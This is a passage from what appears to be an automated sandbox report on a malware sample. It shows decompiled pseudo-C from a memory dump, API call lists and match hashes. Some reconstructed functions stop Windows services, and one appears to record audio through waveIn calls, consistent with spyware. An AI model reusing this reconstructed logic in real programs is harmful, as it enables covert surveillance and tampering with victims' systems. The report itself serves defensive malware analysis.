                                                                                                								_t80 = _v8 + _v16;
                                                                                                								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                                                                                                								goto L33;
                                                                                                							}
                                                                                                							if(__eflags > 0) {
                                                                                                								L20:
                                                                                                								_t104 = 7;
                                                                                                								__eflags = _t118 - _t104;
                                                                                                								if(__eflags > 0) {
                                                                                                									goto L28;
                                                                                                								}
                                                                                                								if(__eflags < 0) {
                                                                                                									L23:
                                                                                                									asm("cdq");
                                                                                                									_push( &_v24);
                                                                                                									asm("sbb ebx, edx");
                                                                                                									_v24 = _t128 - _v8;
                                                                                                									_push(_t155);
                                                                                                									_v20 = _t118;
                                                                                                									_t78 = E0043D9B7();
                                                                                                									__eflags = _t78;
                                                                                                									if(_t78 != 0) {
                                                                                                										goto L11;
                                                                                                									}
                                                                                                									__eflags = _v12 - _t78;
                                                                                                									if(__eflags == 0) {
                                                                                                										goto L44;
                                                                                                									}
                                                                                                									_push(_t155);
                                                                                                									_t107 = E00444344(_t118, _t145, _t155, __eflags);
                                                                                                									__eflags = _t107;
                                                                                                									if(_t107 == 0) {
                                                                                                										goto L44;
                                                                                                									}
                                                                                                									asm("cdq");
                                                                                                									_v24 = _v24 - _v16;
                                                                                                									_push( &_v24);
                                                                                                									asm("sbb [ebp-0x10], edx");
                                                                                                									_push(_t155);
                                                                                                									_t78 = E0043D9B7();
                                                                                                									__eflags = _t78;
                                                                                                									if(_t78 != 0) {
                                                                                                										goto L11;
                                                                                                									}
                                                                                                									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                                                                                                									goto L44;
                                                                                                								}
                                                                                                								__eflags = _t128 - 0x933c7b7f;
                                                                                                								if(_t128 >= 0x933c7b7f) {
                                                                                                									goto L28;
                                                                                                								}
                                                                                                								goto L23;
                                                                                                							}
                                                                                                							__eflags = _t128 - 0x3f480;
                                                                                                							if(_t128 <= 0x3f480) {
                                                                                                								goto L28;
                                                                                                							}
                                                                                                							goto L20;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				E00437736();
                                                                                                				asm("int3");
                                                                                                				_push(_t155);
                                                                                                				_t69 = E0043D952(_t125);
                                                                                                				_t156 = _t69;
                                                                                                				__eflags = _t156;
                                                                                                				if(_t156 != 0) {
                                                                                                					_push(_v0);
                                                                                                					_t70 = E004364F9(0, _t139, _t145, _t156);
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t73 =  !( ~_t70) & _t156;
                                                                                                					__eflags = _t73;
                                                                                                					return _t73;
                                                                                                				}
                                                                                                				return _t69;
                                                                                                			}


                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 00436686
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004366A2
                                                                                                • __allrem.LIBCMT ref: 004366B9
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004366D7
                                                                                                • __allrem.LIBCMT ref: 004366EE
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043670C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: 41b244261037025de60c53adad566b4577aa25982cd7a6b85438bda2ac35dcad
                                                                                                • Instruction ID: 4e631c2561c11cb6d70fa929807129eb316fc76fd6130e53e82cbf7efa599a77
                                                                                                • Opcode Fuzzy Hash: 41b244261037025de60c53adad566b4577aa25982cd7a6b85438bda2ac35dcad
                                                                                                • Instruction Fuzzy Hash: 6781E772A00707BBE7209E69DC42B6F73A89F48768F25953FF411D6381EB78D9008798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E0044042E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                				signed int _v8;
                                                                                                				char _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				char* _v44;
                                                                                                				char _v48;
                                                                                                				void* __ecx;
                                                                                                				signed int _t67;
                                                                                                				signed int _t70;
                                                                                                				signed int _t71;
                                                                                                				signed int _t75;
                                                                                                				intOrPtr _t76;
                                                                                                				signed int _t79;
                                                                                                				signed int _t86;
                                                                                                				intOrPtr _t88;
                                                                                                				signed int _t99;
                                                                                                				void* _t101;
                                                                                                				void* _t103;
                                                                                                				void* _t108;
                                                                                                				signed int _t112;
                                                                                                				signed int _t113;
                                                                                                				signed int _t116;
                                                                                                				signed int _t123;
                                                                                                				signed int _t125;
                                                                                                				intOrPtr _t126;
                                                                                                				signed int _t128;
                                                                                                				intOrPtr _t130;
                                                                                                				signed int _t131;
                                                                                                				void* _t135;
                                                                                                				void* _t136;
                                                                                                				void* _t138;
                                                                                                
                                                                                                				_t120 = __edx;
                                                                                                				_t97 = __ebx;
                                                                                                				_push(_t101);
                                                                                                				if(_a8 != 0) {
                                                                                                					_push(__esi);
                                                                                                					_push(__edi);
                                                                                                					_t123 = 0;
                                                                                                					_t67 = E00439242( &_v8, 0, 0, _a8, 0x7fffffff);
                                                                                                					_t136 = _t135 + 0x14;
                                                                                                					__eflags = _t67;
                                                                                                					if(_t67 == 0) {
                                                                                                						L5:
                                                                                                						_t128 = E00440628(_t101, _v8, 2);
                                                                                                						_pop(_t103);
                                                                                                						__eflags = _t128;
                                                                                                						if(_t128 == 0) {
                                                                                                							L11:
                                                                                                							E004414D5(_t128);
                                                                                                							_t70 = _t123;
                                                                                                							goto L12;
                                                                                                						} else {
                                                                                                							_t71 = E00439242(_t123, _t128, _v8, _a8, 0xffffffff);
                                                                                                							_t136 = _t136 + 0x14;
                                                                                                							__eflags = _t71;
                                                                                                							if(_t71 == 0) {
                                                                                                								_t123 = E0043F7B0(_t97, _t103, _t120, _a4, _t128);
                                                                                                								goto L11;
                                                                                                							} else {
                                                                                                								__eflags = _t71 - 0x16;
                                                                                                								if(_t71 == 0x16) {
                                                                                                									goto L13;
                                                                                                								} else {
                                                                                                									__eflags = _t71 - 0x22;
                                                                                                									if(_t71 != 0x22) {
                                                                                                										goto L11;
                                                                                                									} else {
                                                                                                										goto L13;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						__eflags = _t67 - 0x16;
                                                                                                						if(_t67 == 0x16) {
                                                                                                							L13:
                                                                                                							_push(_t123);
                                                                                                							_push(_t123);
                                                                                                							_push(_t123);
                                                                                                							_push(_t123);
                                                                                                							E00437736();
                                                                                                							asm("int3");
                                                                                                							E004308A0(0x469390, 0x1c);
                                                                                                							_t130 = _a4;
                                                                                                							_t75 = E0044042E(_t97, _t120, _t123, _t130, _t130, _a8);
                                                                                                							_t108 = _t123;
                                                                                                							_t125 = _t75;
                                                                                                							__eflags = _t125;
                                                                                                							if(_t125 != 0) {
                                                                                                								_t76 = E00442F68(_t97, _t108, _t120);
                                                                                                								_v40 = _t76;
                                                                                                								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                                                                                                								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                                                                                                								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                                                                                                								_v32 = 0;
                                                                                                								_t79 = E0043996B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                                                                                                								_t138 = _t136 + 0x18;
                                                                                                								__eflags = _t79;
                                                                                                								if(_t79 == 0) {
                                                                                                									L22:
                                                                                                									_t99 = E00440C6C(_t110, _v32 + 4);
                                                                                                									__eflags = _t99;
                                                                                                									if(_t99 == 0) {
                                                                                                										goto L15;
                                                                                                									} else {
                                                                                                										_t20 = _t99 + 4; // 0x4
                                                                                                										_v36 = _t20;
                                                                                                										_t110 =  &_v48;
                                                                                                										_t125 = 0;
                                                                                                										_t86 = E0043996B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                                                                                                										_t138 = _t138 + 0x18;
                                                                                                										__eflags = _t86;
                                                                                                										if(_t86 == 0) {
                                                                                                											L29:
                                                                                                											_t126 = _v48;
                                                                                                											E004403BD(4);
                                                                                                											_pop(_t112);
                                                                                                											_v8 = _v8 & 0x00000000;
                                                                                                											_t131 = _t130 + _t130;
                                                                                                											_t113 = _t112 | 0xffffffff;
                                                                                                											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                                                                                                											if(__eflags != 0) {
                                                                                                												asm("lock xadd [edx], eax");
                                                                                                												if(__eflags == 0) {
                                                                                                													E004414D5( *(_t126 + 0x24 + _t131 * 8));
                                                                                                													_pop(_t116);
                                                                                                													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                                                                                                													_t113 = _t116 | 0xffffffff;
                                                                                                													__eflags = _t113;
                                                                                                												}
                                                                                                											}
                                                                                                											_t88 = _v40;
                                                                                                											__eflags =  *(_t88 + 0x350) & 0x00000002;
                                                                                                											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                                                                                                												__eflags =  *0x46c994 & 0x00000001;
                                                                                                												if(( *0x46c994 & 0x00000001) == 0) {
                                                                                                													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                                                                                                													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                                                                                                														asm("lock xadd [eax], ecx");
                                                                                                														__eflags = _t113 == 1;
                                                                                                														if(_t113 == 1) {
                                                                                                															E004414D5( *(_t126 + 0x24 + _t131 * 8));
                                                                                                															_t51 = _t126 + 0x24 + _t131 * 8;
                                                                                                															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                                                                                                															__eflags =  *_t51;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                                                                                                											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                                                                                                											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                                                                                                											_v8 = 0xfffffffe;
                                                                                                											E0044061F();
                                                                                                										} else {
                                                                                                											__eflags = _t86 - 0x16;
                                                                                                											if(_t86 == 0x16) {
                                                                                                												L26:
                                                                                                												_push(_t125);
                                                                                                												_push(_t125);
                                                                                                												_push(_t125);
                                                                                                												_push(_t125);
                                                                                                												_push(_t125);
                                                                                                												goto L20;
                                                                                                											} else {
                                                                                                												__eflags = _t86 - 0x22;
                                                                                                												if(_t86 != 0x22) {
                                                                                                													__eflags = _t86;
                                                                                                													if(_t86 == 0) {
                                                                                                														goto L29;
                                                                                                													} else {
                                                                                                														E004414D5(_t99);
                                                                                                														goto L15;
                                                                                                													}
                                                                                                												} else {
                                                                                                													goto L26;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eflags = _t79 - 0x16;
                                                                                                									if(_t79 == 0x16) {
                                                                                                										L19:
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										L20:
                                                                                                										_t79 = E00437736();
                                                                                                									} else {
                                                                                                										__eflags = _t79 - 0x22;
                                                                                                										if(_t79 == 0x22) {
                                                                                                											goto L19;
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags = _t79;
                                                                                                									if(_t79 != 0) {
                                                                                                										goto L15;
                                                                                                									} else {
                                                                                                										goto L22;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								L15:
                                                                                                							}
                                                                                                							return E004308E6();
                                                                                                						} else {
                                                                                                							__eflags = _t67 - 0x22;
                                                                                                							if(_t67 == 0x22) {
                                                                                                								goto L13;
                                                                                                							} else {
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t70 = E0043F7B0(__ebx, _t101, __edx, _a4, 0);
                                                                                                					L12:
                                                                                                					return _t70;
                                                                                                				}
                                                                                                			}


































                                                                                                0x00440503
                                                                                                0x00440508
                                                                                                0x00440517
                                                                                                0x0044051c
                                                                                                0x0044051f
                                                                                                0x00440521
                                                                                                0x0044053b
                                                                                                0x00440548
                                                                                                0x0044054a
                                                                                                0x0044054c
                                                                                                0x00000000
                                                                                                0x0044054e
                                                                                                0x0044054e
                                                                                                0x00440551
                                                                                                0x00440554
                                                                                                0x0044055f
                                                                                                0x00440562
                                                                                                0x00440567
                                                                                                0x0044056a
                                                                                                0x0044056c
                                                                                                0x0044058f
                                                                                                0x0044058f
                                                                                                0x00440594
                                                                                                0x00440599
                                                                                                0x0044059a
                                                                                                0x0044059e
                                                                                                0x004405a4
                                                                                                0x004405a7
                                                                                                0x004405a9
                                                                                                0x004405ad
                                                                                                0x004405b1
                                                                                                0x004405b7
                                                                                                0x004405bc
                                                                                                0x004405bd
                                                                                                0x004405c2
                                                                                                0x004405c2
                                                                                                0x004405c2
                                                                                                0x004405b1
                                                                                                0x004405c5
                                                                                                0x004405c8
                                                                                                0x004405cf
                                                                                                0x004405d1
                                                                                                0x004405d8
                                                                                                0x004405de
                                                                                                0x004405e0
                                                                                                0x004405e2
                                                                                                0x004405e6
                                                                                                0x004405e7
                                                                                                0x004405ed
                                                                                                0x004405f3
                                                                                                0x004405f3
                                                                                                0x004405f3
                                                                                                0x004405f3
                                                                                                0x004405e7
                                                                                                0x004405e0
                                                                                                0x004405d8
                                                                                                0x004405fb
                                                                                                0x004405fd
                                                                                                0x00440604
                                                                                                0x00440608
                                                                                                0x0044060f
                                                                                                0x0044056e
                                                                                                0x0044056e
                                                                                                0x00440571
                                                                                                0x00440578
                                                                                                0x00440578
                                                                                                0x00440579
                                                                                                0x0044057a
                                                                                                0x0044057b
                                                                                                0x0044057c
                                                                                                0x00000000
                                                                                                0x00440573
                                                                                                0x00440573
                                                                                                0x00440576
                                                                                                0x0044057f
                                                                                                0x00440581
                                                                                                0x00000000
                                                                                                0x00440583
                                                                                                0x00440584
                                                                                                0x00000000
                                                                                                0x00440589
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440576
                                                                                                0x00440571
                                                                                                0x0044056c
                                                                                                0x00440523
                                                                                                0x00440523
                                                                                                0x00440526
                                                                                                0x0044052d
                                                                                                0x0044052d
                                                                                                0x0044052e
                                                                                                0x0044052f
                                                                                                0x00440530
                                                                                                0x00440531
                                                                                                0x00440532
                                                                                                0x00440532
                                                                                                0x00440528
                                                                                                0x00440528
                                                                                                0x0044052b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044052b
                                                                                                0x00440537
                                                                                                0x00440539
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440539
                                                                                                0x004404eb
                                                                                                0x004404eb
                                                                                                0x004404eb
                                                                                                0x0044061b
                                                                                                0x0044046b
                                                                                                0x0044046b
                                                                                                0x0044046e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044046e
                                                                                                0x00440469
                                                                                                0x0044043a
                                                                                                0x0044043f
                                                                                                0x004404bc
                                                                                                0x004404bf
                                                                                                0x004404bf

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: 566cfcf8c804574d67b9eb2eb36bbe01557985d331379be858919b5c1a739c6c
                                                                                                • Instruction ID: f63d0c326be49aad20fdc0adda446bc1fbab64303f82e00d34fc54ab1abf13bd
                                                                                                • Opcode Fuzzy Hash: 566cfcf8c804574d67b9eb2eb36bbe01557985d331379be858919b5c1a739c6c
                                                                                                • Instruction Fuzzy Hash: 14510832904205BBFB249B698C41EAF77A8DF48334F50421FFA15D6292DB3CDD608A6C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00442F68(void* __ebx, void* __ecx, void* __edx) {
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t2;
                                                                                                				void* _t3;
                                                                                                				void* _t4;
                                                                                                				intOrPtr _t9;
                                                                                                				void* _t11;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                				void* _t23;
                                                                                                				void* _t25;
                                                                                                				void* _t27;
                                                                                                				void* _t29;
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                				long _t36;
                                                                                                				long _t37;
                                                                                                				void* _t40;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_t23 = __ecx;
                                                                                                				_t20 = __ebx;
                                                                                                				_t36 = GetLastError();
                                                                                                				_t2 =  *0x46c1d0; // 0x6
                                                                                                				_t42 = _t2 - 0xffffffff;
                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                					L2:
                                                                                                					_t3 = E00440628(_t23, 1, 0x364);
                                                                                                					_t31 = _t3;
                                                                                                					_pop(_t25);
                                                                                                					if(_t31 != 0) {
                                                                                                						_t4 = E00443565(_t25, _t36, __eflags,  *0x46c1d0, _t31);
                                                                                                						__eflags = _t4;
                                                                                                						if(_t4 != 0) {
                                                                                                							E00442DDA(_t25, _t31, 0x46d654);
                                                                                                							E004414D5(0);
                                                                                                							_t40 = _t40 + 0xc;
                                                                                                							__eflags = _t31;
                                                                                                							if(_t31 == 0) {
                                                                                                								goto L9;
                                                                                                							} else {
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_push(_t31);
                                                                                                							goto L4;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_push(_t3);
                                                                                                						L4:
                                                                                                						E004414D5();
                                                                                                						_pop(_t25);
                                                                                                						L9:
                                                                                                						SetLastError(_t36);
                                                                                                						E00440C29(_t20, _t29, _t31, _t36);
                                                                                                						asm("int3");
                                                                                                						_push(_t20);
                                                                                                						_push(_t36);
                                                                                                						_push(_t31);
                                                                                                						_t37 = GetLastError();
                                                                                                						_t21 = 0;
                                                                                                						_t9 =  *0x46c1d0; // 0x6
                                                                                                						_t45 = _t9 - 0xffffffff;
                                                                                                						if(_t9 == 0xffffffff) {
                                                                                                							L12:
                                                                                                							_t32 = E00440628(_t25, 1, 0x364);
                                                                                                							_pop(_t27);
                                                                                                							if(_t32 != 0) {
                                                                                                								_t11 = E00443565(_t27, _t37, __eflags,  *0x46c1d0, _t32);
                                                                                                								__eflags = _t11;
                                                                                                								if(_t11 != 0) {
                                                                                                									E00442DDA(_t27, _t32, 0x46d654);
                                                                                                									E004414D5(_t21);
                                                                                                									__eflags = _t32;
                                                                                                									if(_t32 != 0) {
                                                                                                										goto L19;
                                                                                                									} else {
                                                                                                										goto L18;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_push(_t32);
                                                                                                									goto L14;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_push(_t21);
                                                                                                								L14:
                                                                                                								E004414D5();
                                                                                                								L18:
                                                                                                								SetLastError(_t37);
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t32 = E0044350F(_t25, _t37, _t45, _t9);
                                                                                                							if(_t32 != 0) {
                                                                                                								L19:
                                                                                                								SetLastError(_t37);
                                                                                                								_t21 = _t32;
                                                                                                							} else {
                                                                                                								goto L12;
                                                                                                							}
                                                                                                						}
                                                                                                						return _t21;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t31 = E0044350F(_t23, _t36, _t42, _t2);
                                                                                                					if(_t31 != 0) {
                                                                                                						L8:
                                                                                                						SetLastError(_t36);
                                                                                                						return _t31;
                                                                                                					} else {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                				}
                                                                                                			}






















                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                • _free.LIBCMT ref: 00442F9F
                                                                                                • _free.LIBCMT ref: 00442FC7
                                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                • _abort.LIBCMT ref: 00442FE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: 1e4138895fae7c9047720f3c33760644ac9f1401f8a87db4429ce4b1c10d1c67
                                                                                                • Instruction ID: 2c0683b24ab965397330a20c71536410671755a8ab653b9c9cc214fb2eae9d72
                                                                                                • Opcode Fuzzy Hash: 1e4138895fae7c9047720f3c33760644ac9f1401f8a87db4429ce4b1c10d1c67
                                                                                                • Instruction Fuzzy Hash: 4CF0F4315487003AF211372ABD05F2B2536ABD1B7AFA0012BF90996296EEECC89A551D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00416ED3(char _a4) {
                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                				signed int _t16;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                
                                                                                                				_t16 = 0;
                                                                                                				_t20 = OpenSCManagerW(0, 0, 0x40);
                                                                                                				_t19 = OpenServiceW(_t20, E00401EDD( &_a4), 0x40);
                                                                                                				if(_t19 != 0) {
                                                                                                					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                                                                                                					CloseServiceHandle(_t20);
                                                                                                					CloseServiceHandle(_t19);
                                                                                                				} else {
                                                                                                					CloseServiceHandle(_t20);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t16;
                                                                                                			}

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004168FA,00000000), ref: 00416EE2
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004168FA,00000000), ref: 00416EF6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004168FA,00000000), ref: 00416F03
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,004168FA,00000000), ref: 00416F12
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004168FA,00000000), ref: 00416F24
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004168FA,00000000), ref: 00416F27
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b42d642342782bdebb0959b0029eefb95f6047d298d638c5d11a833be5b35123
                                                                                                • Instruction ID: 0454fd493aead8f103b726478faddeea12546fc58cd4c8d89fe282ce12ce19e9
                                                                                                • Opcode Fuzzy Hash: b42d642342782bdebb0959b0029eefb95f6047d298d638c5d11a833be5b35123
                                                                                                • Instruction Fuzzy Hash: 7FF0C2325002186BD210AF65AC89DBF3B6CDB85B55F11002AFF099A192DB38CD8695E9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00401853(void* __edx, intOrPtr _a8, intOrPtr _a16) {
                                                                                                				char _v32;
                                                                                                				void* _v52;
                                                                                                				char _v64;
                                                                                                				void* _v76;
                                                                                                				char _v96;
                                                                                                				void* _v100;
                                                                                                				char _v120;
                                                                                                				void* _v124;
                                                                                                				char _v144;
                                                                                                				void* _v148;
                                                                                                				char _v168;
                                                                                                				void* _v172;
                                                                                                				char _v192;
                                                                                                				void* _v196;
                                                                                                				char _v216;
                                                                                                				char _v220;
                                                                                                				char _v232;
                                                                                                				char _v240;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t28;
                                                                                                				void* _t32;
                                                                                                				void* _t33;
                                                                                                				void* _t34;
                                                                                                				void* _t40;
                                                                                                				signed int _t59;
                                                                                                				void* _t107;
                                                                                                				signed int _t121;
                                                                                                				void* _t123;
                                                                                                
                                                                                                				_t107 = __edx;
                                                                                                				_t123 = (_t121 & 0xfffffff8) - 0xdc;
                                                                                                				if( *0x46fd78 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                                                                                                					E0042FE69(0x46fd78);
                                                                                                					_t126 =  *0x46fd78 - 0xffffffff;
                                                                                                					if( *0x46fd78 == 0xffffffff) {
                                                                                                						E004047EF(0);
                                                                                                						E004301F3(_t126, E004538EF);
                                                                                                						E0042FE2A(0x46fd78, 0x46fd78);
                                                                                                					}
                                                                                                				}
                                                                                                				E004020C7(0,  &_v220);
                                                                                                				_t28 = _a8 - 0x3be;
                                                                                                				if(_t28 == 0) {
                                                                                                					L10:
                                                                                                					 *0x46fd7c = 0;
                                                                                                					goto L11;
                                                                                                				} else {
                                                                                                					if(_t28 != 0) {
                                                                                                						L11:
                                                                                                						return E00401FB9();
                                                                                                					}
                                                                                                					_t129 =  *0x46da74 - 1;
                                                                                                					if( *0x46da74 != 1) {
                                                                                                						_t32 = E00401E3B(0x46e0c8, _t107, _t129,  *0x46fd7c);
                                                                                                						_t33 = E0040209D(0,  &_v32, _t107, _t129, _a16, 0x20);
                                                                                                						_t34 = E0040209D(0,  &_v64, _t107, _t129, 0x46da98, 0x12);
                                                                                                						_t113 = E00402F85(0,  &_v192, E00402F0F( &_v168, E00402F85(0,  &_v144, E00402F0F( &_v120, E00402FA9( &_v96, 0x46e108, 0x46e250), _t34), _t129, 0x46e250), _t33), _t129, 0x46e250);
                                                                                                						_t40 = E00402F85(0,  &_v216, _t39, _t129, _t32);
                                                                                                						_t13 =  &_v240; // 0x46e250
                                                                                                						E00401FC3(_t13, _t39, 0x46e250, _t40);
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						waveInUnprepareHeader( *0x46dab8, ( *0x46fd7c << 5) +  *0x46e104, 0x20);
                                                                                                						E004017D6( *0x46fd7c, _t39, _t129);
                                                                                                						_t130 =  *0x46fcfc - 0xffffffff;
                                                                                                						if( *0x46fcfc == 0xffffffff) {
                                                                                                							E00404943(0x46fcf8);
                                                                                                							E004049DE(0x46fcf8, 0x46e250, 0x46fcf8);
                                                                                                						}
                                                                                                						E004020DE(0, _t123 - 0x18, _t113, _t130,  &_v232);
                                                                                                						_push(0x61);
                                                                                                						E00404BB7(0, 0x46fcf8, _t113, _t130);
                                                                                                						_t59 =  *0x46fd7c + 1;
                                                                                                						 *0x46fd7c = _t59;
                                                                                                						if(_t59 < 2) {
                                                                                                							goto L11;
                                                                                                						} else {
                                                                                                							goto L10;
                                                                                                						}
                                                                                                					}
                                                                                                					E00404F18(0x46fcf8, _t107);
                                                                                                					ExitThread(0);
                                                                                                				}
                                                                                                 			}

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004018A7
                                                                                                • ExitThread.KERNEL32 ref: 004018DF
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,0046E250,00000000), ref: 004019ED
                                                                                                  • Part of subcall function 004301F3: __onexit.LIBCMT ref: 004301F9
                                                                                                Strings
                                                                                                Memory Dump Source
